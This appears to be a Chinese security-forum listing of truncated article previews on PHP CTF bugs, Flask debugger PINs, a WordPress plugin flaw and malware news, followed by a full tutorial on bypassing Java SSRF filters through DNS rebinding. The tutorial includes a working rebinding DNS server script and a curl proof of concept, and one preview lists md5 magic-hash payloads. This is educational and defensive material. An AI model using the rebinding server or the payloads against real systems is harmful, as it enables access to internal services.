# ctf中常见的PHP漏洞小结
在做ctf题的时候经常会遇到一些PHP代码审计的题目,这里将我遇到过的常见漏洞做一个小结。
## md5()漏洞
PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
常见的payload有
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
sha1... | 社区文章 |
现代网站为了提高性能,获取数据并提供更多的服务,通常采取透明系统(译者注:
透明系统是指程序的输入输出可知)镜像来供用户访问。这种几乎不可见的攻击面已经被人们过于的忽略了。
在这篇文章中,我会向大家展示如何使用畸形请求和迷惑的请求头去欺骗系统暴露它们自己,同时打开通往受害者网络的大门。同时我将分享如何把这些技术与bash组合去突破防御部门的网络,并在漏洞悬赏中获取了超过3万美元的奖励以及意外的渗透了自己的ISP(因特网服务供应商)。
当论及到损害程度的话,我也会展示几个系统从隐藏到被揭露的状态,这不仅包括对英国最大的ISP的隐蔽请求的窃听,还有相当可疑的哥伦比亚ISP,令人困惑的Tor后台,以及一个能够将反射型XSS升级为SSRF的... | 社区文章 |
# 前言
之前在国赛决赛的时候看到p0师傅提到的关于Flask
debug模式下,配合任意文件读取,造成的任意代码执行。那时候就很感兴趣,无奈后来事情有点多,一直没来得及研究。今天把这个终于把这个问题复现了一下
主要就是利用Flask在debug模式下会生成一个Debugger PIN
kingkk@ubuntu:~/Code/flask$ python3 app.py
* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
* Restarting with stat
* Debugger is active!
* Debu... | 社区文章 |
## 前言
Page Builder by
SiteOrigin是一个安装量超过100W的WordPress页面生成器插件,该插件可帮助用户使用基于小工具的页面生成器轻松构建响应式页面内容
近日wordfence安全人员披露了一个Page Builder by SiteOrigin2.10.15及以下版本中发现的严重安全漏洞:
CSRF to
XSS。攻击者可以通过诱使WordPress站点管理员单击特制链接以触发该漏洞,成功利用该漏洞可以使攻击者创建一个新的管理员帐户并安装后门程序。
## 漏洞分析
Page Builder bySiteOrigin插件内置一款实时编辑器,用户可以在观察实时更改的同时更新内容,这使得页面的编辑... | 社区文章 |
签到选手不请自来,经过了好几天的琢磨,终于把这次比赛的题目都弄得差不多了,这里记录一下本次比赛 Web
题目的解法,如果师傅们有更好更有意思的解法,欢迎多多与菜鸡交流。非常感谢 @rebirth @wonderkun @wupco
等师傅在我学习本次比赛赛题时候不厌其烦地指导我。
## File Magician
> **Difficulty estimate** : easy
>
> **Solved** :133/321
>
> **Points** : round(1000 · min(1, 10 / (9 + [133 solves]))) = **70** points
>
> **Description:**
>
> F... | 社区文章 |
# 【技术分享】目标韩国!黑客组织利用云服务攻击
|
##### 译文声明
本文是翻译文章,文章来源:fortinet.com
原文地址:<http://blog.fortinet.com/2017/09/20/evasive-malware-campaign-abuses-free-cloud-service-targets-korean-speakers>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
*... | 社区文章 |
# 从SDLC到DevOps下的广义应用安全管控体系
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:平安银行应用安全团队@贾凯
## 前言
17年起,我们引入建立了适合内部研发的SDLC流程,在传统的研发模式下,一个需求从意向拆分到用户故事,再到开发子任务,一次迭代大多都要经过2周以上的时间。经过重人力运营的严格SDLC活动(各业务开发条线配备一名或多名专职安全运营人力进入开发团队深度运营),完成下来基本上可以极大的降低应用安全风险。但随着这两年公司IT人力迅速扩张,以及各类业务需求的爆发增长,推动着敏捷开发的迭代周期不断缩短,倒逼研发模式向DevOps转型。这种状态下,重人力运营的SDL... | 社区文章 |
# 【漏洞预警】CVE-2017-2636:linux 内核n_hdlc驱动模块 本地提权漏洞
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**漏洞描述:**
漏洞编号:CVE-2017-2636
漏洞发现者:Alexander Popov
漏洞危害:高危,低权限用户利用该漏洞可以在Linux系统上实现本地提权。
影响范围:这个bug最早引入在2009年6月22号。在该日期发布后的内核版本均可能受该漏洞影响。详情请参看
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=be... | 社区文章 |
# 【技术分享】黑盒渗透测试的一些姿势和个人总结
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
作者:[FoxRoot](http://bobao.360.cn/member/contribute?uid=2785699456)
预估稿费:350RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**前记**
对于“渗透测试”这个事,我也时常纠结,尤其在“度”的方面上,毕竟自己还很年轻。个人感觉,渗透是在不影响单位正常运营的前提下的一场完整攻击,目标是一个面不是一个点。但是,大家都懂得2333。
入坑以来,跟着网上师傅们分享的各种好文章划来划去,终于... | 社区文章 |
# web应用防火墙逃逸技术(一)
##### 译文声明
本文是翻译文章,文章来源:https://medium.com/
原文地址:<https://medium.com/secjuice/waf-evasion-techniques-718026d693d8>
译文仅供参考,具体内容表达以及含义原文为准。
### 传送门: [web应用防火墙逃逸技术(二)](https://www.anquanke.com/post/id/145542)
## 前记
在Web应用程序中发现远程命令执行漏洞并不罕见,并且”注入”被公认为”2017 OWASP Top 10”之首
当不可信数据作为命令或查询的一部分发送给解释器时,会发生注入漏... | 社区文章 |
# 【漏洞分析】GitLab的文件读取问题导致的RCE漏洞
|
##### 译文声明
本文是翻译文章,文章来源:hackerone
原文地址:<https://hackerone.com/reports/178152>
译文仅供参考,具体内容表达以及含义原文为准。
**
**
**翻译:**[ **WisFree**](http://bobao.360.cn/member/contribute?uid=2606963099)
**稿费:160RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆 ** ** **[
**网页版**](http://bobao.360.cn/contribut... | 社区文章 |
# 5月5日安全热点 - 近50万个心脏起搏器固件更新解决危及生命的漏洞
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 漏洞 Vulnerability
CVE-2018-10547:PHP .phar文件反射型XSS漏洞
<http://t.cn/Ru35e3e>
安卓手机unicode漏洞导致崩溃
<http://t.cn/Run1V8V>
思科 WebEx Advanced Recording Format(ARF) 远程代码执行漏洞
<http://t.cn/Ru3xOoO>
TP-Link EAP 控制器多个漏洞
<http://t.cn/Ru3xOKI>
D-LINK DIR-... | 社区文章 |
# 针对物联网路由协议的Spam DIS攻击
|
##### 译文声明
本文是翻译文章,文章原作者 Cong Pu,文章来源:ieeexplore.ieee.org
原文地址:<https://ieeexplore.ieee.org/abstract/document/8685628>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 Abstract
低功耗有损网络(LLN)由一组在通信、计算、内存和能源方面受资源限制的节点组成,在实现无处不在的计算和通信范例中起着至关重要的作用。为了提供有效和可靠的通信,并使资源受限的节点集成到互联网中,已经提出了一种用于LLN的新颖路由协议,称为RPL。
但是由于固有的资源限制、缺... | 社区文章 |
**作者: Badcode@知道创宇404实验室**
**日期: 2019/07/09**
**英文版本:<https://paper.seebug.org/1000/>**
### 漏洞简介
Adobe ColdFusion 是一个商用的快速开发平台。它可以作为一个开发平台使用,也可以提供Flash远程服务或者作为 Adobe
Flex应用的后台服务器 。
2019年06月11日,Adobe
发布[安全公告](https://helpx.adobe.com/security/products/coldfusion/apsb19-27.html),修复了Adobe
ColdFusion多个严重漏洞。其中有一个由Mor... | 社区文章 |
这篇简短的文章描述了我们在实战过程中的对Linux内核漏洞的调查以及我对Semmle
QL和Coccinelle的使用经验,我曾经用该工具来搜索类似的bug。
### 内核漏洞
几天前,我的自定义`syzkaller`项目代码产生了崩溃。它具有一个非常稳定的reproducer
,所以我借用此模块进行研究。在这里,我将借此机会说`syzkaller`是一个非常棒的项目,对我们的行业产生了很大的影响。
我发现导致此崩溃的错误已在commit 229b53c9bf4e(2017年6月)中的`drivers/block/floppy.c`中引入。
`compat_getdrvstat()`函数代码如下所示:
static int ... | 社区文章 |
本文由红日安全成员: **七月火** 编写,如有不当,还望斧正。
## 前言
最近发现 **dedecms** 的 **nday后台getshell** ,于是打算还原一下。根据日志显示,攻击者访问了
**dede/ad_add.php** 文件后,转而访问 **plus/ad_js.php** 文件,提交的 **payload** 为 **plus/ad
_js.php?nocache=1 &aid=1&_=whoami** 。
## 前期准备
DedeCMS V5.7
SP2正式版下载:<http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar... | 社区文章 |
# 一种针对纸质投票的可扩展侧信道攻击
|
##### 译文声明
本文是翻译文章,文章原作者 Kristjan Krips, Jan Willemson, Sebastian
Värv,文章来源:ieeexplore.ieee.org
原文地址:<https://ieeexplore.ieee.org/abstract/document/8806759/>
译文仅供参考,具体内容表达以及含义原文为准。
在对电子投票和纸质投票的安全性进行比较的讨论中,隐私的减少通常是反对远程互联网投票的一种说法。本文提出了针对传统纸质选举物理环境的侧信道攻击。更准确地说,基于Arduino开发板和廉价的驻极体麦克风构建了一种设备,该设备能够高精度地对... | 社区文章 |
## 前言
起源于强网杯的密码学题目random study
## java.util.Random
题目中challenge two的主要代码如下:
o = subprocess.check_output(["java", "Main"])
tmp=[]
for i in o.split("\n")[0:3]:
tmp.append(int(i.strip()))
v1=tmp[0] % 0xffffffff
v2=tmp[1] % 0xffffffff
v3=tmp[2] % 0xffffffff
还给了一个Main.class文件,打开发现是字节码,用jd-gui... | 社区文章 |
# 【技术分享】Lua程序逆向之Luac字节码与反汇编
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
作者:[非虫](http://bobao.360.cn/member/contribute?uid=2669205776)
预估稿费:800RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**传送门**
****
****[**【技术分享】Lua程序逆向之Luac文件格式分析**](http://bobao.360.cn/learning/detail/4534.html)
**
**
**简介**
****
在了解完了Luac字节码文件的整... | 社区文章 |
# L3HCTF 2021 MISC Lambda 题目详细分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
L3HCTF的题目质量相当高了,这次来复现一下比赛的时候差一点就解出的Lamda,
也是把自己当时比赛时候的思路和最后看了WP之后的正确思路都捋一捋,这种使用现成的项目对流量进行加密的流量题确实蛮有意思。
## 题目背景
出题人是拿一个C++的项目(ReHLDS)搭了一个CS1.6的服务器,并用客户端连接服务器,而在这同时进行了抓包,题目附件就是抓到的流量包,和虎符CTF的流量取证题目有着异曲同工之妙,都蛮好玩。
## 解题过程
flag的前几部分在地图的资源包中,可以在流量包的tc... | 社区文章 |
## 0x01 什么是SQL注入
sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。
## 0x02 SQL注入的分类
### 按变量类型分
* 数字型
* 字符型
### 按HTTP提交方式分
* GET注入
* POST注入
* Cookie注入
### 按注入方式分
* 报错注入
* 盲注
* 布尔盲注
* 时间盲注
* union注入
### 编码问题
* 宽字节注入
## 0x03识别后台数据库
### 根据操作系统平台
**sql server** :Windows(IIS)
**MySQL** :Apache
### 根据web语... | 社区文章 |
# OpenSSL CVE-2016-0799: BIO_printf函数可引起堆内存崩溃
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://guidovranken.wordpress.com/2016/02/27/openssl-cve-2016-0799-heap-corruption-via-bio_printf/>
译文仅供参考,具体内容表达以及含义原文为准。
OpenSSL
是一个强大的安全套接字层密码库,其囊括了目前主流的密码算法,常用的密钥,证书封装管理功能以及SSL协议,并提供了丰富的应用程序可供开发人员测试或其它目的使用。
但是安全研究人员发现,OpenSSL的BIO... | 社区文章 |
# 安全快讯21 | 工信部整治APP开屏弹窗骚扰用户行为
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 诈骗先知
### 扫描陌生人二维码被敲诈22万
小王扫描网友发送的二维码下载软件,但扫完并无下载提示,随后网友发送了小王的相册照片等隐私数据勒索小王。转账给对方5万元后,对方依然没有删除照片,并继续敲诈共计22万余元。
据了解,犯罪分子售卖自己编辑后的App源码和使用教程来赚钱,这类App的前端源码可以获取他人手机通讯录、相册照片、短信、定位等隐私数据,并能将他们传输至指定的域名或IP地址上,而进行非法牟利。
**安全专家提示您:不要扫描陌生二维码,更不要安装不明来源的软件!**
**... | 社区文章 |
## 文章前言
Microsoft为Windows Server 2008 R2以及更高版本提供了多个Active Directory PowerShell
cmdlet,例如:Get-Aduser、Get-Adcomputer和Get-a
object等等,这些cmdlet可以帮助我们检索AD的许多信息,本篇文章主要介绍通过Windows Server 2008
R2/2012/2016或更高版本下通过Active Directory PowerShell cmdlet来进行域内信息收集的方法。
## 使用前提
在使用Windows客户端上使用时,我们需要安装远程服务器管理工具(RSAT)并确保已安装Active Director... | 社区文章 |
# 某logCMS的代码审计:越权到后台getshell
## 前言
学习CTF这么久还没真正意义上审计过一款cms,这次决定花点时间去审计一款cms作为代码审计提升的跳板。由于相关要求,这里就省去cms全名了,主要分享一下学习思路。
## 代码审计
### 安装漏洞
其实一般代码审计都是从安装文件开始审计,一般安装脚本主要存在如下漏洞:
* 无验证功能,任意重装覆盖
* 表单不做过滤写入config.php导致getshell
* $_GET['step']跳过限制步骤
漏洞文件:`install.php`
首先我们直奔第一个点能否任意重装,我们可以看到必须常量`DEL_INSTALLER`为1的时候才会... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html>**
## 摘要
Cisco Talos在2021年9月发现了一个新的恶意活动,攻击者使用了泄露的Cobalt Strike版本。 尽管Cobalt
Strike最初是作为合法工具创建的,但它仍然是安全工作者需要监视的东西,因为攻击者正在使用它来设置攻击。本例中的攻击者使用Cloudflare内容分发网络的域前置,将缅甸政府拥有的域定向到攻击者控制的服务器。攻击者采用在其攻击链中重新注册知名域的策略来逃避检... | 社区文章 |
# 浅入深出 Redis 攻击方法总结
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## Redis是什么?
Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI
C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted
set
—有序集合)和hash(哈希类型)。这些数据类型... | 社区文章 |
作者:云鼎实验室
#### 一、漏洞背景
漏洞编号:CVE-2018-1999002
漏洞等级:高危
Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 Orange
(博客链接:http://blog.orange.tw/)挖出的 Jenkins 未授权任意文件读取漏洞。
腾讯安全云鼎实验室安全研究人员对该漏洞进行分析发现,利用这个漏洞,攻击者可以读取 Windows 服务器上的任意文件,对于
Linux,在特定条件下也可以进行文件读取。利用文件读取漏洞,攻击者可以获取到 Jenkins
的凭证信息,从而造成敏感信息泄露。另外,在很多时候,Jenkins 的部分凭证和其内用户的帐号密... | 社区文章 |
# 浅谈如何逆向分析WebAssembly二进制文件
|
##### 译文声明
本文是翻译文章,文章来源:forcepoint.com
原文地址:<https://www.forcepoint.com/blog/security-labs/analyzing-webassembly-binaries>
译文仅供参考,具体内容表达以及含义原文为准。
我们最近发表了一篇关于[WebAssembly](https://www.forcepoint.com/blog/security-labs/webassembly-potentials-and-pitfalls)(Wasm)基本概念及其安全问题的博文。作为后续,本文将对Wasm应用程序的... | 社区文章 |
# 【技术分享】API安全架构之概念初探
|
##### 译文声明
本文是翻译文章,文章来源:websec.io
原文地址:<https://websec.io/2017/04/14/Build-Secure-API-Part1.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
译者:[ **阿诺斯基**](http://bobao.360.cn/member/contribute?uid=2826612711)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**API驱动的世界**
**毫无疑问,随着时间的推移,我们所生活的世界正在变得越来越紧密。新... | 社区文章 |
# 前言
在 `CMS` 中难免会调用到 `SQL` 执行(废话),百密总有一疏,今天跟师傅们分享一些平时审计时遇到的注入,可能不全面,希望和师傅们一起学习。
# 关于 ThinkPHP 中的 注入
这绝对是能拿来探讨探讨的,因为我看到的版本就有两三种了,这里给出两个例子。
## ThinkPHP3.2.3
首先我们举个最简单的例子作为开场:
public function login(){
$User = D('User');
$map = array('username' => $_POST['username']);
$user = $User->where($map)-... | 社区文章 |
**作者:栈长@蚂蚁金服巴斯光年安全实验室**
* * *
## **一、前言**
FFmpeg是一个著名的处理音视频的开源项目,使用者众多。2016年末paulcher发现FFmpeg三个堆溢出漏洞分别为CVE-2016-10190、CVE-2016-10191以及CVE-2016-10192。网上对CVE-2016-10190已经有了很多分析文章,但是CVE-2016-10191尚未有其他人分析过。本文详细分析了CVE-2016-10191,是学习漏洞挖掘以及利用的一个非常不错的案例。
## **二、漏洞成因分析**
在 RTMP协议中,最小的发送数据包的单位是一个 chunk。客户端和服务器会互相协商好发送给对方的 chunk... | 社区文章 |
ERROR: type should be string, got "https://joychou.org/web/use-dnsrebinding-to-bypass-ssrf-in-java.html\n### 0x00 前言\n本篇文章会比较详细的介绍,如何使用DNS\nRebinding绕过Java中的SSRF。网上有蛮多资料介绍用该方法绕过常规的SSRF,但是由于Java的机制和PHP等语言不太一样。所以,我觉得,有必要单独拿出来聊一聊,毕竟目前很多甲方公司业务代码都是Java。\n### 0x01 SSRF修复逻辑\n 1. 取URL的Host\n 2. 取Host的IP\n 3. 判断是否是内网IP,是内网IP直接return,不再往下执行\n 4. 请求URL\n 5. 如果有跳转,取出跳转URL,执行第1步\n 6. 正常的业务逻辑里,当判断完成最后会去请求URL,实现业务逻辑。\n所以,其中会发起DNS请求的步骤为,第2、4、6步,看来至少要请求3次。因为第6步至少会执行1次DNS请求。\n另外,网上有很多不严谨的SSRF修复逻辑不会判断跳转,导致可以被Bypass。\n### 0x02 DNS Rebinding\n我个人理解如下:\n> 通过自己搭建DNS服务器,返回自己定义的IP,进行一些限制的绕过。\n所以,我们可以利用DNS Rebinding在第一次发起DNS请求时,返回外网IP,后面全部返回内网IP 这种方式来绕过如上的修复逻辑。\n我们来看下是如何绕过的。\n首先,修复逻辑中第2步发起DNS请求,DNS服务器返回一个外网IP,通过验证,执行到第四步。 \n接着,修复逻辑中第4步会发起DNS请求,DNS服务器返回一个内网IP。此时,SSRF已经产生。\n#### TTL\n不过,这一切都是在TTL为0的前提下。\n什么是TTL?\n> TTL(Time To\n> Live)是DNS缓存的时间。简单理解,假如一个域名的TTL为10s,当我们在这10s内,对该域名进行多次DNS请求,DNS服务器,只会收到一次请求,其他的都是缓存。\n所以搭建的DNS服务器,需要设置TTL为0。如果不设置TTL为0,第二次DNS请求返回的是第一次缓存的外网IP,也就不能绕过了。\n#### DNS请求过程\n步骤如下:\n 1. 查询本地DNS服务器(`/etc/resolv.conf`)\n 2. 如果有缓存,返回缓存的结果,不继续往下执行\n 3. 如果没有缓存,请求远程DNS服务器,并返回结果\n#### DNS缓存机制\n平时使用的MAC和Windows电脑上,为了加快HTTP访问速度,系统都会进行DNS缓存。但是,在Linux上,默认不会进行DNS缓存(<https://stackoverflow.com/questions/11020027/dns-caching-in-linux>) ,除非运行nscd等软件。\n不过,知道Linux默认不进行DNS缓存即可。这也解释了,我为什么同样的配置,我在MAC上配置不成功,Linux上配置可以。\n需要注意的是,IP为8.8.8.8的DNS地址,本地不会进行DNS缓存。\n### 0x03 漏洞测试\n准备如下环境:\n * Java Web应用\n * DNS服务器\n我们要先了解下Java应用的TTL。Java应用的默认TTL为10s,这个默认配置会导致DNS\nRebinding绕过失败。也就是说,默认情况下,Java应用不受DNS Rebinding影响。\nJava TTL的值可以通过下面三种方式进行修改:\n 1. JVM添加启动参数`-Dsun.net.inetaddr.ttl=0`\n 2. 通过代码进行修改`java.security.Security.setProperty("networkaddress.cache.negative.ttl" , "0");`\n 3. 修改`/Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/Home/jre/lib/security/java.security(我MAC下的路径)`里的`networkaddress.cache.negative.ttl=0`\n这个地方是个大坑,我之前在测试时,一直因为这个原因,导致测试不成功。\n这也是利用DNS\nRebinding过程中,Java和PHP不一样的地方。在测试PHP时,[这份PHP代码](https://github.com/chengable/safe_code/blob/master/ssrf_check.php)用DNS\nRebinding可以绕过,类似的代码Java就不能被绕过了。\n#### SSRF漏洞搭建\n用Java Spring写了一个漏洞测试地址为 \n<http://test.joychou.org:8080/checkssrf?url=http://dns_rebind.joychou.me。URL会进行SSRF验证。>\nSSRF修复代码如下。也可以在Github上查看<https://github.com/JoyChou93/trident>\n /*\n * check SSRF (判断逻辑为判断URL的IP是否是内网IP)\n * 如果是内网IP,返回false,表示checkSSRF不通过。否则返回true。即合法返回true\n * URL只支持HTTP协议\n * 设置了访问超时时间为3s\n */\n public static Boolean checkSSRF(String url) {\n HttpURLConnection connection;\n String finalUrl = url;\n try {\n do {\n // 判断当前请求的URL是否是内网ip\n Boolean bRet = isInnerIpFromUrl(finalUrl);\n if (bRet) {\n return false;\n }\n connection = (HttpURLConnection) new URL(finalUrl).openConnection();\n connection.setInstanceFollowRedirects(false);\n connection.setUseCaches(false); // 设置为false,手动处理跳转,可以拿到每个跳转的URL\n connection.setConnectTimeout(3*1000); // 设置连接超时时间为3s\n //connection.setRequestMethod(\"GET\");\n connection.connect(); // send dns request\n int responseCode = connection.getResponseCode(); // 发起网络请求 no dns request\n if (responseCode >= 300 && responseCode <=307 && responseCode != 304 && responseCode != 306) {\n String redirectedUrl = connection.getHeaderField(\"Location\");\n if (null == redirectedUrl)\n break;\n finalUrl = redirectedUrl;\n // System.out.println(\"redirected url: \" + finalUrl);\n } else\n break;\n } while (connection.getResponseCode() != HttpURLConnection.HTTP_OK);\n connection.disconnect();\n } catch (Exception e) {\n return true;\n }\n return true;\n }\n /*\n 内网IP:\n 10.0.0.1 - 10.255.255.254 (10.0.0.0/8)\n 192.168.0.1 - 192.168.255.254 (192.168.0.0/16)\n 127.0.0.1 - 127.255.255.254 (127.0.0.0/8)\n 172.16.0.1 - 172.31.255.254 (172.16.0.0/12)\n */\n public static boolean isInnerIp(String strIP) throws IOException {\n try{\n String[] ipArr = strIP.split(\"\\\\.\");\n if (ipArr.length != 4){\n return false;\n }\n int ip_split1 = Integer.parseInt(ipArr[1]);\n return (ipArr[0].equals(\"10\") ||\n ipArr[0].equals(\"127\") ||\n (ipArr[0].equals(\"172\") && ip_split1 >= 16 && ip_split1 <=31) ||\n (ipArr[0].equals(\"192\") && ipArr[1].equals(\"168\")));\n }catch (Exception e) {\n return false;\n }\n }\n /*\n * 域名转换为IP\n * 会将各种进制的ip转为正常ip\n * 167772161转换为10.0.0.1\n * 127.0.0.1.xip.io转换为127.0.0.1\n */\n public static String DomainToIP(String domain) throws IOException{\n try {\n InetAddress IpAddress = InetAddress.getByName(domain); // send dns request\n return IpAddress.getHostAddress();\n }\n catch (Exception e) {\n return \"\";\n }\n }\n /*\n 从URL中获取域名\n 限制为http/https协议\n */\n public static String getUrlDomain(String url) throws IOException{\n try {\n URL u = new URL(url);\n if (!u.getProtocol().startsWith(\"http\") && !u.getProtocol().startsWith(\"https\")) {\n throw new IOException(\"Protocol error: \" + u.getProtocol());\n }\n return u.getHost();\n } catch (Exception e) {\n return \"\";\n }\n }\n#### 搭建DNS服务器\n域名配置如下:\n此时,当访问`dns_rebind.joychou.me`域名,先解析该域名的DNS域名为`ns.joychou.me`,`ns.joychou.me`指向47这台服务器。\nDNS Server代码如下,放在47服务器上。其功能是将第一次DNS请求返回`35.185.163.135`,后面所有请求返回`127.0.0.1`\ndns.py\n from twisted.internet import reactor, defer\n from twisted.names import client, dns, error, server\n record={}\n class DynamicResolver(object):\n def _doDynamicResponse(self, query):\n name = query.name.name\n if name not in record or record[name]<1:\n ip = \"35.185.163.135\"\n else:\n ip = \"127.0.0.1\"\n if name not in record:\n record[name] = 0\n record[name] += 1\n print name + \" ===> \" + ip\n answer = dns.RRHeader(\n name = name,\n type = dns.A,\n cls = dns.IN,\n ttl = 0,\n payload = dns.Record_A(address = b'%s' % ip, ttl=0)\n )\n answers = [answer]\n authority = []\n additional = []\n return answers, authority, additional\n def query(self, query, timeout=None):\n return defer.succeed(self._doDynamicResponse(query))\n def main():\n factory = server.DNSServerFactory(\n clients=[DynamicResolver(), client.Resolver(resolv='/etc/resolv.conf')]\n )\n protocol = dns.DNSDatagramProtocol(controller=factory)\n reactor.listenUDP(53, protocol)\n reactor.run()\n if __name__ == '__main__':\n raise SystemExit(main())\n运行`python dns.py`,dig查看下返回。\n ➜ security dig @8.8.8.8 dns_rebind.joychou.me\n ; <<>> DiG 9.8.3-P1 <<>> @8.8.8.8 dns_rebind.joychou.me\n ; (1 server found)\n ;; global options: +cmd\n ;; Got answer:\n ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40376\n ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0\n ;; QUESTION SECTION:\n ;dns_rebind.joychou.me. IN A\n ;; ANSWER SECTION:\n dns_rebind.joychou.me. 0 IN A 35.185.163.135\n ;; Query time: 203 msec\n ;; SERVER: 8.8.8.8#53(8.8.8.8)\n ;; WHEN: Fri Sep 8 14:52:43 2017\n ;; MSG SIZE rcvd: 55\n ➜ security dig @8.8.8.8 dns_rebind.joychou.me\n ; <<>> DiG 9.8.3-P1 <<>> @8.8.8.8 dns_rebind.joychou.me\n ; (1 server found)\n ;; global options: +cmd\n ;; Got answer:\n ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14172\n ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0\n ;; QUESTION SECTION:\n ;dns_rebind.joychou.me. IN A\n ;; ANSWER SECTION:\n dns_rebind.joychou.me. 0 IN A 127.0.0.1\n ;; Query time: 172 msec\n ;; SERVER: 8.8.8.8#53(8.8.8.8)\n ;; WHEN: Fri Sep 8 14:52:45 2017\n ;; MSG SIZE rcvd: 55\n可以看到第一次返回35.185.163.135,第二次返回127.0.0.1。\ndig加上@8.8.8.8是指定本地DNS地址为8.8.8.8,因为该地址不会有缓存。每dig一次,DNS Server都会收到一次请求。\n#### 绕过POC\n curl 'http://test.joychou.org:8080/checkssrf?url=http://dns_rebind.joychou.me'\n返回`test.joychou.org`页面内容`It works.` \n在测试时,我把该服务器的80端口已经限制为只有本地能访问,所以,我们的POC已经绕过内网的限制。\n### 0x04 总结\n * Java默认不存在被DNS Rebinding绕过风险(TTL默认为10)\n * PHP默认会被DNS Rebinding绕过\n * Linux默认不会进行DNS缓存\n### 0x05 参考\n 1. <[http://blog.csdn.net/u011721501/article/details/54667714>](http://blog.csdn.net/u011721501/article/details/54667714>);\n 2. <[https://stackoverflow.com/questions/11020027/dns-caching-in-linux>](https://stackoverflow.com/questions/11020027/dns-caching-in-linux>);\n 3. <[https://bobao.360.cn/learning/detail/3074.html>](https://bobao.360.cn/learning/detail/3074.html>);\n 4. <[https://github.com/chengable/safe_code/blob/master/ssrf_check.php>](https://github.com/chengable/safe_code/blob/master/ssrf_check.php>);\n 5. <[https://stackoverflow.com/questions/1256556/any-way-to-make-java-honor-the-dns-caching-timeout-ttl>](https://stackoverflow.com/questions/1256556/any-way-to-make-java-honor-the-dns-caching-timeout-ttl>);" | 社区文章 |
# 分析TetCTF 2020中Crypto方向题目
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在TetCTF 2020中有5道Crypto方向的题目,题目难度适中,在这里对题目进行一下分析。
## 2019rearrange
题目描述如下:
Rearrange your 2019, keep your joy, throw all your sorrow away!
Files:[2019rearrange.zip](https://github.com/ichunqiu-resources/anquanke/blob/master/008/2019rearrange.zip... | 社区文章 |
## 一、概述
### 1.1 登录逻辑
系统开放3012、12017两个端口,前者为身份认证接口,以json形式返回token与权限参数,后者为业务系统,前端调用js-aes对json加密得到cookie
### 1.2 漏洞成因
业务系统与接口彼此独立,仅验证token真实性,未检测cookie完整性,攻击者能解密cookie则可修改参数实现越权,而系统采用不安全的前端加密,导致漏洞产生
## 二、过程
### 2.1 js信息泄露
settingService.js,泄露aes密钥 _1234567812345678_ 与偏移向量 _1234567812345678_
### 2.2 漏洞验证
对cookie解密得到jso... | 社区文章 |
将蜜罐技术应用到内网攻击感知中,一篇硕士论文的研究过程与demo实现,抛砖引玉。 **题图**
为原论文摘要的简单分词统计。计划的系列文章内容分为以下几个部分:
1. **蜜罐与内网安全选题思考**
2. 蜜罐技术科普与发展简述(2016年)-本文
3. 常见内网攻击类型及检测思路
4. 多款开源蜜罐数据样例与应用分析
5. 攻击序列、攻击模式与攻击者标签
6. 攻击模式匹配算法提出
7\. demo系统设计
8\. demo实现过程中的一些技术点
7. 实验室环境下的测试过程
8. 我的论文小结(附参考文献列表)
在技术研究、系统实现和论文撰写的过程中,感谢我的导师F与师兄[o... | 社区文章 |
#### **0x00 前言**
这段时间开始学习了linux内核提权,也跟进看了一些漏洞。但是由于linux系统版本、内核版本的不同,驱动模块或者是某个函数的加载地址都是不同的,如果不能自己亲自调试内核,就算给了exp也是无法利用。之前也没有怎么接触过内核调试,所以这几天找了许多资料开始学习调试内核的方法,总结整理在这。
本文测试系统是Ubuntu12.04 64位。
#### **0x01 准备环境**
首先当然是准备需要调试的内核版本,linux的所有历史版本都可以在[这里](https://www.kernel.org/pub/linux/kernel/)找到。
down下来后进入源码树根目录,开始配置内核,这里使用基于... | 社区文章 |
### 事件介绍
